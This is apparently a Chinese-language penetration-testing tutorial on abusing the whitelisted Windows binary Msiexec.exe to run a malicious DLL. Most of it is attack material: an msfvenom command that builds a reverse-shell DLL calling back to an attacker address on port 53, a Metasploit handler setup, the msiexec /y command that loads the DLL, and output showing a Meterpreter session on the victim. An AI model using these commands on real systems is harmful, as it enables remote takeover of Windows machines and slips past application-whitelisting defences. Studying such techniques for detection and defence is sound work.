Msiexec是Windows Installer的一部分。用于安装Windows Installer安装包(MSI),一般在运行Microsoft Update安装更新或安装部分软件的时候出现,占用内存比较大。并且集成于Windows 2003,Windows 7等。
基于白名单Msiexec.exe配置payload:
Copy msfvenom ‐p windows/x64/shell/reverse_tcp LHOST= 192.168.1.4 LPORT= 53 ‐ f dll > Micropoor_rev_x64_53.dll
Copy msf exploit ( multi/handler ) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐ ‐‐‐‐‐‐‐‐‐‐‐
EXITFUNC process yes Exit technique (Accepted: '' , seh, thread, process,none )
LHOST 192.168.1.4 yes The listen address (an interface may be specified )
LPORT 53 yes The listen port
Exploit target:
Id Name
‐‐ ‐‐‐‐
0 Wildcard Target
msf exploit ( multi/handler ) > exploit
[ * ] Started reverse TCP handler on 192.168.1.4:53
Copy msiexec /y C: \U sers \J ohn \D esktop \M icropoor_rev_x64_dll.dll
Copy msf exploit ( multi/handler ) > exploit
[ * ] Started reverse TCP handler on 192.168.1.4:53
[ * ] Sending stage ( 206403 bytes ) to 192.168.1.5
[ * ] Meterpreter session 26 opened ( 192.168.1.4:53 ‐ > 192.168.1.5:11543 )
at 2019‐01‐20 09:45:51 ‐0500
meterpreter > getuid
Server username: John‐PC \J ohn
meterpreter > getpid
Current pid: 7672
meterpreter >